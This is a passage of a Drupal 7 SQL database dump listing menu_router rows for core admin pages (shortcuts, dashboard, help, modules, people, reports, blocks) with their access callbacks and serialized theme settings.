shortcuts','shortcut_set_title_callback','a:1:{i:0;i:4;}','','a:0:{}',6,'','',0,'modules/shortcut/shortcut.admin.inc'),('admin/config/user-interface/shortcut/%/add-link','a:1:{i:4;s:17:\"shortcut_set_load\";}','','shortcut_set_edit_access','a:1:{i:0;i:4;}','drupal_get_form','a:2:{i:0;s:17:\"shortcut_link_add\";i:1;i:4;}','',61,6,1,'admin/config/user-interface/shortcut/%','admin/config/user-interface/shortcut/%','Add shortcut','t','','','a:0:{}',388,'','',0,'modules/shortcut/shortcut.admin.inc'),('admin/config/user-interface/shortcut/%/add-link-inline','a:1:{i:4;s:17:\"shortcut_set_load\";}','','shortcut_set_edit_access','a:1:{i:0;i:4;}','shortcut_link_add_inline','a:1:{i:0;i:4;}','',61,6,0,'','admin/config/user-interface/shortcut/%/add-link-inline','Add shortcut','t','','','a:0:{}',0,'','',0,'modules/shortcut/shortcut.admin.inc'),('admin/config/user-interface/shortcut/%/delete','a:1:{i:4;s:17:\"shortcut_set_load\";}','','shortcut_set_delete_access','a:1:{i:0;i:4;}','drupal_get_form','a:2:{i:0;s:24:\"shortcut_set_delete_form\";i:1;i:4;}','',61,6,0,'','admin/config/user-interface/shortcut/%/delete','Delete shortcut set','t','','','a:0:{}',6,'','',0,'modules/shortcut/shortcut.admin.inc'),('admin/config/user-interface/shortcut/%/edit','a:1:{i:4;s:17:\"shortcut_set_load\";}','','shortcut_set_edit_access','a:1:{i:0;i:4;}','drupal_get_form','a:2:{i:0;s:22:\"shortcut_set_edit_form\";i:1;i:4;}','',61,6,1,'admin/config/user-interface/shortcut/%','admin/config/user-interface/shortcut/%','Edit set name','t','','','a:0:{}',132,'','',10,'modules/shortcut/shortcut.admin.inc'),('admin/config/user-interface/shortcut/%/links','a:1:{i:4;s:17:\"shortcut_set_load\";}','','shortcut_set_edit_access','a:1:{i:0;i:4;}','drupal_get_form','a:2:{i:0;s:22:\"shortcut_set_customize\";i:1;i:4;}','',61,6,1,'admin/config/user-interface/shortcut/%','admin/config/user-interface/shortcut/%','List links','t','','','a:0:{}',140,'','',0,'modules/shortcut/shortcut.admin.inc'),('admin/config/user-interface/shortcut/add-set','','','user_access','a:1:{i:0;s:20:\"administer shortcuts\";}','drupal_get_form','a:1:{i:0;s:21:\"shortcut_set_add_form\";}','',31,5,1,'admin/config/user-interface/shortcut','admin/config/user-interface/shortcut','Add shortcut set','t','','','a:0:{}',388,'','',0,'modules/shortcut/shortcut.admin.inc'),('admin/config/user-interface/shortcut/link/%','a:1:{i:5;s:14:\"menu_link_load\";}','','shortcut_link_access','a:1:{i:0;i:5;}','drupal_get_form','a:2:{i:0;s:18:\"shortcut_link_edit\";i:1;i:5;}','',62,6,0,'','admin/config/user-interface/shortcut/link/%','Edit shortcut','t','','','a:0:{}',6,'','',0,'modules/shortcut/shortcut.admin.inc'),('admin/config/user-interface/shortcut/link/%/delete','a:1:{i:5;s:14:\"menu_link_load\";}','','shortcut_link_access','a:1:{i:0;i:5;}','drupal_get_form','a:2:{i:0;s:20:\"shortcut_link_delete\";i:1;i:5;}','',125,7,0,'','admin/config/user-interface/shortcut/link/%/delete','Delete shortcut','t','','','a:0:{}',6,'','',0,'modules/shortcut/shortcut.admin.inc'),('admin/config/workflow','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_menu_block_page','a:0:{}','',7,3,0,'','admin/config/workflow','Workflow','t','','','a:0:{}',6,'Content workflow, editorial workflow tools.','right',5,'modules/system/system.admin.inc'),('admin/content','','','user_access','a:1:{i:0;s:23:\"access content overview\";}','drupal_get_form','a:1:{i:0;s:18:\"node_admin_content\";}','',3,2,0,'','admin/content','Content','t','','','a:0:{}',6,'Administer content and comments.','',-10,'modules/node/node.admin.inc'),('admin/content/comment','','','user_access','a:1:{i:0;s:19:\"administer comments\";}','comment_admin','a:0:{}','',7,3,1,'admin/content','admin/content','Comments','t','','','a:0:{}',134,'List and edit site comments and the comment approval queue.','',0,'modules/comment/comment.admin.inc'),('admin/content/comment/approval','','','user_access','a:1:{i:0;s:19:\"administer comments\";}','comment_admin','a:1:{i:0;s:8:\"approval\";}','',15,4,1,'admin/content/comment','admin/content','Unapproved comments','comment_count_unpublished','','','a:0:{}',132,'','',0,'modules/comment/comment.admin.inc'),('admin/content/comment/new','','','user_access','a:1:{i:0;s:19:\"administer comments\";}','comment_admin','a:0:{}','',15,4,1,'admin/content/comment','admin/content','Published comments','t','','','a:0:{}',140,'','',-10,'modules/comment/comment.admin.inc'),('admin/content/node','','','user_access','a:1:{i:0;s:23:\"access content overview\";}','drupal_get_form','a:1:{i:0;s:18:\"node_admin_content\";}','',7,3,1,'admin/content','admin/content','Content','t','','','a:0:{}',140,'','',-10,'modules/node/node.admin.inc'),('admin/dashboard','','','user_access','a:1:{i:0;s:16:\"access dashboard\";}','dashboard_admin','a:0:{}','',3,2,0,'','admin/dashboard','Dashboard','t','','','a:0:{}',6,'View and customize your dashboard.','',-15,''),('admin/dashboard/block-content/%/%','a:2:{i:3;N;i:4;N;}','','user_access','a:1:{i:0;s:17:\"administer blocks\";}','dashboard_show_block_content','a:2:{i:0;i:3;i:1;i:4;}','',28,5,0,'','admin/dashboard/block-content/%/%','','t','','','a:0:{}',0,'','',0,''),('admin/dashboard/configure','','','user_access','a:1:{i:0;s:17:\"administer blocks\";}','dashboard_admin_blocks','a:0:{}','',7,3,0,'','admin/dashboard/configure','Configure available dashboard blocks','t','','','a:0:{}',4,'Configure which blocks can be shown on the dashboard.','',0,''),('admin/dashboard/customize','','','user_access','a:1:{i:0;s:16:\"access dashboard\";}','dashboard_admin','a:1:{i:0;b:1;}','',7,3,0,'','admin/dashboard/customize','Customize dashboard','t','','','a:0:{}',4,'Customize your dashboard.','',0,''),('admin/dashboard/drawer','','','user_access','a:1:{i:0;s:17:\"administer blocks\";}','dashboard_show_disabled','a:0:{}','',7,3,0,'','admin/dashboard/drawer','','t','','','a:0:{}',0,'','',0,''),('admin/dashboard/update','','','user_access','a:1:{i:0;s:17:\"administer blocks\";}','dashboard_update','a:0:{}','',7,3,0,'','admin/dashboard/update','','t','','','a:0:{}',0,'','',0,''),('admin/help','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_main','a:0:{}','',3,2,0,'','admin/help','Help','t','','','a:0:{}',6,'Reference for usage, configuration, and modules.','',9,'modules/help/help.admin.inc'),('admin/help/block','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/block','block','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/color','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/color','color','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/comment','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/comment','comment','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/contact','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/contact','contact','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/contextual','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/contextual','contextual','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/dashboard','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/dashboard','dashboard','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/dblog','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/dblog','dblog','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/field','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/field','field','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/field_sql_storage','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/field_sql_storage','field_sql_storage','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/field_ui','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/field_ui','field_ui','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/file','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/file','file','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/filter','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/filter','filter','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/help','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/help','help','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/image','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/image','image','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/list','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/list','list','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/menu','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/menu','menu','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/node','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/node','node','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/number','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/number','number','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/options','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/options','options','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/overlay','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/overlay','overlay','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/path','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/path','path','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/rdf','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/rdf','rdf','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/search','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/search','search','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/shortcut','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/shortcut','shortcut','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/statistics','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/statistics','statistics','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/system','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/system','system','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/taxonomy','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/taxonomy','taxonomy','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/text','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/text','text','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/toolbar','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/toolbar','toolbar','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/update','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/update','update','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/user','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/user','user','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/index','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_index','a:0:{}','',3,2,1,'admin','admin','Index','t','','','a:0:{}',132,'','',-18,'modules/system/system.admin.inc'),('admin/modules','','','user_access','a:1:{i:0;s:18:\"administer modules\";}','drupal_get_form','a:1:{i:0;s:14:\"system_modules\";}','',3,2,0,'','admin/modules','Modules','t','','','a:0:{}',6,'Extend site functionality.','',-2,'modules/system/system.admin.inc'),('admin/modules/install','','','update_manager_access','a:0:{}','drupal_get_form','a:2:{i:0;s:27:\"update_manager_install_form\";i:1;s:6:\"module\";}','',7,3,1,'admin/modules','admin/modules','Install new module','t','','','a:0:{}',388,'','',25,'modules/update/update.manager.inc'),('admin/modules/list','','','user_access','a:1:{i:0;s:18:\"administer modules\";}','drupal_get_form','a:1:{i:0;s:14:\"system_modules\";}','',7,3,1,'admin/modules','admin/modules','List','t','','','a:0:{}',140,'','',0,'modules/system/system.admin.inc'),('admin/modules/list/confirm','','','user_access','a:1:{i:0;s:18:\"administer modules\";}','drupal_get_form','a:1:{i:0;s:14:\"system_modules\";}','',15,4,0,'','admin/modules/list/confirm','List','t','','','a:0:{}',4,'','',0,'modules/system/system.admin.inc'),('admin/modules/uninstall','','','user_access','a:1:{i:0;s:18:\"administer modules\";}','drupal_get_form','a:1:{i:0;s:24:\"system_modules_uninstall\";}','',7,3,1,'admin/modules','admin/modules','Uninstall','t','','','a:0:{}',132,'','',20,'modules/system/system.admin.inc'),('admin/modules/uninstall/confirm','','','user_access','a:1:{i:0;s:18:\"administer modules\";}','drupal_get_form','a:1:{i:0;s:24:\"system_modules_uninstall\";}','',15,4,0,'','admin/modules/uninstall/confirm','Uninstall','t','','','a:0:{}',4,'','',0,'modules/system/system.admin.inc'),('admin/modules/update','','','update_manager_access','a:0:{}','drupal_get_form','a:2:{i:0;s:26:\"update_manager_update_form\";i:1;s:6:\"module\";}','',7,3,1,'admin/modules','admin/modules','Update','t','','','a:0:{}',132,'','',10,'modules/update/update.manager.inc'),('admin/people','','','user_access','a:1:{i:0;s:16:\"administer users\";}','user_admin','a:1:{i:0;s:4:\"list\";}','',3,2,0,'','admin/people','People','t','','','a:0:{}',6,'Manage user accounts, roles, and permissions.','left',-4,'modules/user/user.admin.inc'),('admin/people/create','','','user_access','a:1:{i:0;s:16:\"administer users\";}','user_admin','a:1:{i:0;s:6:\"create\";}','',7,3,1,'admin/people','admin/people','Add user','t','','','a:0:{}',388,'','',0,'modules/user/user.admin.inc'),('admin/people/people','','','user_access','a:1:{i:0;s:16:\"administer users\";}','user_admin','a:1:{i:0;s:4:\"list\";}','',7,3,1,'admin/people','admin/people','List','t','','','a:0:{}',140,'Find and manage people interacting with your site.','',-10,'modules/user/user.admin.inc'),('admin/people/permissions','','','user_access','a:1:{i:0;s:22:\"administer permissions\";}','drupal_get_form','a:1:{i:0;s:22:\"user_admin_permissions\";}','',7,3,1,'admin/people','admin/people','Permissions','t','','','a:0:{}',132,'Determine access to features by selecting permissions for roles.','',0,'modules/user/user.admin.inc'),('admin/people/permissions/list','','','user_access','a:1:{i:0;s:22:\"administer permissions\";}','drupal_get_form','a:1:{i:0;s:22:\"user_admin_permissions\";}','',15,4,1,'admin/people/permissions','admin/people','Permissions','t','','','a:0:{}',140,'Determine access to features by selecting permissions for roles.','',-8,'modules/user/user.admin.inc'),('admin/people/permissions/roles','','','user_access','a:1:{i:0;s:22:\"administer permissions\";}','drupal_get_form','a:1:{i:0;s:16:\"user_admin_roles\";}','',15,4,1,'admin/people/permissions','admin/people','Roles','t','','','a:0:{}',132,'List, edit, or add user roles.','',-5,'modules/user/user.admin.inc'),('admin/people/permissions/roles/delete/%','a:1:{i:5;s:14:\"user_role_load\";}','','user_role_edit_access','a:1:{i:0;i:5;}','drupal_get_form','a:2:{i:0;s:30:\"user_admin_role_delete_confirm\";i:1;i:5;}','',62,6,0,'','admin/people/permissions/roles/delete/%','Delete role','t','','','a:0:{}',6,'','',0,'modules/user/user.admin.inc'),('admin/people/permissions/roles/edit/%','a:1:{i:5;s:14:\"user_role_load\";}','','user_role_edit_access','a:1:{i:0;i:5;}','drupal_get_form','a:2:{i:0;s:15:\"user_admin_role\";i:1;i:5;}','',62,6,0,'','admin/people/permissions/roles/edit/%','Edit role','t','','','a:0:{}',6,'','',0,'modules/user/user.admin.inc'),('admin/reports','','','user_access','a:1:{i:0;s:19:\"access site reports\";}','system_admin_menu_block_page','a:0:{}','',3,2,0,'','admin/reports','Reports','t','','','a:0:{}',6,'View reports, updates, and errors.','left',5,'modules/system/system.admin.inc'),('admin/reports/access-denied','','','user_access','a:1:{i:0;s:19:\"access site reports\";}','dblog_top','a:1:{i:0;s:13:\"access denied\";}','',7,3,0,'','admin/reports/access-denied','Top \'access denied\' errors','t','','','a:0:{}',6,'View \'access denied\' errors (403s).','',0,'modules/dblog/dblog.admin.inc'),('admin/reports/access/%','a:1:{i:3;N;}','','user_access','a:1:{i:0;s:17:\"access statistics\";}','statistics_access_log','a:1:{i:0;i:3;}','',14,4,0,'','admin/reports/access/%','Details','t','','','a:0:{}',6,'View access log.','',0,'modules/statistics/statistics.admin.inc'),('admin/reports/dblog','','','user_access','a:1:{i:0;s:19:\"access site reports\";}','dblog_overview','a:0:{}','',7,3,0,'','admin/reports/dblog','Recent log messages','t','','','a:0:{}',6,'View events that have recently been logged.','',-1,'modules/dblog/dblog.admin.inc'),('admin/reports/event/%','a:1:{i:3;N;}','','user_access','a:1:{i:0;s:19:\"access site reports\";}','dblog_event','a:1:{i:0;i:3;}','',14,4,0,'','admin/reports/event/%','Details','t','','','a:0:{}',6,'','',0,'modules/dblog/dblog.admin.inc'),('admin/reports/fields','','','user_access','a:1:{i:0;s:24:\"administer content types\";}','field_ui_fields_list','a:0:{}','',7,3,0,'','admin/reports/fields','Field list','t','','','a:0:{}',6,'Overview of fields on all entity types.','',0,'modules/field_ui/field_ui.admin.inc'),('admin/reports/hits','','','user_access','a:1:{i:0;s:17:\"access statistics\";}','statistics_recent_hits','a:0:{}','',7,3,0,'','admin/reports/hits','Recent hits','t','','','a:0:{}',6,'View pages that have recently been visited.','',0,'modules/statistics/statistics.admin.inc'),('admin/reports/page-not-found','','','user_access','a:1:{i:0;s:19:\"access site reports\";}','dblog_top','a:1:{i:0;s:14:\"page not found\";}','',7,3,0,'','admin/reports/page-not-found','Top \'page not found\' errors','t','','','a:0:{}',6,'View \'page not found\' errors (404s).','',0,'modules/dblog/dblog.admin.inc'),('admin/reports/pages','','','user_access','a:1:{i:0;s:17:\"access statistics\";}','statistics_top_pages','a:0:{}','',7,3,0,'','admin/reports/pages','Top pages','t','','','a:0:{}',6,'View pages that have been hit frequently.','',1,'modules/statistics/statistics.admin.inc'),('admin/reports/referrers','','','user_access','a:1:{i:0;s:17:\"access statistics\";}','statistics_top_referrers','a:0:{}','',7,3,0,'','admin/reports/referrers','Top referrers','t','','','a:0:{}',6,'View top referrers.','',0,'modules/statistics/statistics.admin.inc'),('admin/reports/search','','','user_access','a:1:{i:0;s:19:\"access site reports\";}','dblog_top','a:1:{i:0;s:6:\"search\";}','',7,3,0,'','admin/reports/search','Top search phrases','t','','','a:0:{}',6,'View most popular search phrases.','',0,'modules/dblog/dblog.admin.inc'),('admin/reports/status','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','system_status','a:0:{}','',7,3,0,'','admin/reports/status','Status report','t','','','a:0:{}',6,'Get a status report about your site\'s operation and any detected problems.','',-60,'modules/system/system.admin.inc'),('admin/reports/status/php','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','system_php','a:0:{}','',15,4,0,'','admin/reports/status/php','PHP','t','','','a:0:{}',0,'','',0,'modules/system/system.admin.inc'),('admin/reports/status/rebuild','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','drupal_get_form','a:1:{i:0;s:30:\"node_configure_rebuild_confirm\";}','',15,4,0,'','admin/reports/status/rebuild','Rebuild permissions','t','','','a:0:{}',0,'','',0,'modules/node/node.admin.inc'),('admin/reports/status/run-cron','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','system_run_cron','a:0:{}','',15,4,0,'','admin/reports/status/run-cron','Run cron','t','','','a:0:{}',0,'','',0,'modules/system/system.admin.inc'),('admin/reports/updates','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','update_status','a:0:{}','',7,3,0,'','admin/reports/updates','Available updates','t','','','a:0:{}',6,'Get a status report about available updates for your installed modules and themes.','',-50,'modules/update/update.report.inc'),('admin/reports/updates/check','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','update_manual_status','a:0:{}','',15,4,0,'','admin/reports/updates/check','Manual update check','t','','','a:0:{}',0,'','',0,'modules/update/update.fetch.inc'),('admin/reports/updates/install','','','update_manager_access','a:0:{}','drupal_get_form','a:2:{i:0;s:27:\"update_manager_install_form\";i:1;s:6:\"report\";}','',15,4,1,'admin/reports/updates','admin/reports/updates','Install new module or theme','t','','','a:0:{}',388,'','',25,'modules/update/update.manager.inc'),('admin/reports/updates/list','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','update_status','a:0:{}','',15,4,1,'admin/reports/updates','admin/reports/updates','List','t','','','a:0:{}',140,'','',0,'modules/update/update.report.inc'),('admin/reports/updates/settings','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:15:\"update_settings\";}','',15,4,1,'admin/reports/updates','admin/reports/updates','Settings','t','','','a:0:{}',132,'','',50,'modules/update/update.settings.inc'),('admin/reports/updates/update','','','update_manager_access','a:0:{}','drupal_get_form','a:2:{i:0;s:26:\"update_manager_update_form\";i:1;s:6:\"report\";}','',15,4,1,'admin/reports/updates','admin/reports/updates','Update','t','','','a:0:{}',132,'','',10,'modules/update/update.manager.inc'),('admin/reports/visitors','','','user_access','a:1:{i:0;s:17:\"access statistics\";}','statistics_top_visitors','a:0:{}','',7,3,0,'','admin/reports/visitors','Top visitors','t','','','a:0:{}',6,'View visitors that hit many pages.','',2,'modules/statistics/statistics.admin.inc'),('admin/structure','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_menu_block_page','a:0:{}','',3,2,0,'','admin/structure','Structure','t','','','a:0:{}',6,'Administer blocks, content types, menus, etc.','right',-8,'modules/system/system.admin.inc'),('admin/structure/block','','','user_access','a:1:{i:0;s:17:\"administer blocks\";}','block_admin_display','a:1:{i:0;s:6:\"bartik\";}','',7,3,0,'','admin/structure/block','Blocks','t','','','a:0:{}',6,'Configure what block content appears in your site\'s sidebars and other regions.','',0,'modules/block/block.admin.inc'),('admin/structure/block/add','','','user_access','a:1:{i:0;s:17:\"administer blocks\";}','drupal_get_form','a:1:{i:0;s:20:\"block_add_block_form\";}','',15,4,1,'admin/structure/block','admin/structure/block','Add block','t','','','a:0:{}',388,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/demo/bartik','','','_block_themes_access','a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:25:\"themes/bartik/bartik.info\";s:4:\"name\";s:6:\"bartik\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:6:\"Bartik\";s:11:\"description\";s:48:\"A flexible, recolorable theme with many regions.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:28:\"themes/bartik/css/layout.css\";s:13:\"css/style.css\";s:27:\"themes/bartik/css/style.css\";s:14:\"css/colors.css\";s:28:\"themes/bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:27:\"themes/bartik/css/print.css\";}}s:7:\"regions\";a:20:{s:6:\"header\";s:6:\"Header\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:11:\"highlighted\";s:11:\"Highlighted\";s:8:\"featured\";s:8:\"Featured\";s:7:\"content\";s:7:\"Content\";s:13:\"sidebar_first\";s:13:\"Sidebar first\";s:14:\"sidebar_second\";s:14:\"Sidebar second\";s:14:\"triptych_first\";s:14:\"Triptych first\";s:15:\"triptych_middle\";s:15:\"Triptych middle\";s:13:\"triptych_last\";s:13:\"Triptych last\";s:18:\"footer_firstcolumn\";s:19:\"Footer first column\";s:19:\"footer_secondcolumn\";s:20:\"Footer second column\";s:18:\"footer_thirdcolumn\";s:19:\"Footer third column\";s:19:\"footer_fourthcolumn\";s:20:\"Footer fourth column\";s:6:\"footer\";s:6:\"Footer\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"0\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:28:\"themes/bartik/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1416429488;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:28:\"themes/bartik/css/layout.css\";s:13:\"css/style.css\";s:27:\"themes/bartik/css/style.css\";s:14:\"css/colors.css\";s:28:\"themes/bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:27:\"themes/bartik/css/print.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}','block_admin_demo','a:1:{i:0;s:6:\"bartik\";}','',31,5,0,'','admin/structure/block/demo/bartik','Bartik','t','','_block_custom_theme','a:1:{i:0;s:6:\"bartik\";}',0,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/demo/garland','','','_block_themes_access','a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:27:\"themes/garland/garland.info\";s:4:\"name\";s:7:\"garland\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"0\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:7:\"Garland\";s:11:\"description\";s:111:\"A multi-column theme which can be configured to modify colors and switch between fixed and fluid width layouts.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:1:{s:9:\"style.css\";s:24:\"themes/garland/style.css\";}s:5:\"print\";a:1:{s:9:\"print.css\";s:24:\"themes/garland/print.css\";}}s:8:\"settings\";a:1:{s:13:\"garland_width\";s:5:\"fluid\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:6:\"engine\";s:11:\"phptemplate\";s:7:\"regions\";a:12:{s:13:\"sidebar_first\";s:12:\"Left sidebar\";s:14:\"sidebar_second\";s:13:\"Right sidebar\";s:7:\"content\";s:7:\"Content\";s:6:\"header\";s:6:\"Header\";s:6:\"footer\";s:6:\"Footer\";s:11:\"highlighted\";s:11:\"Highlighted\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard 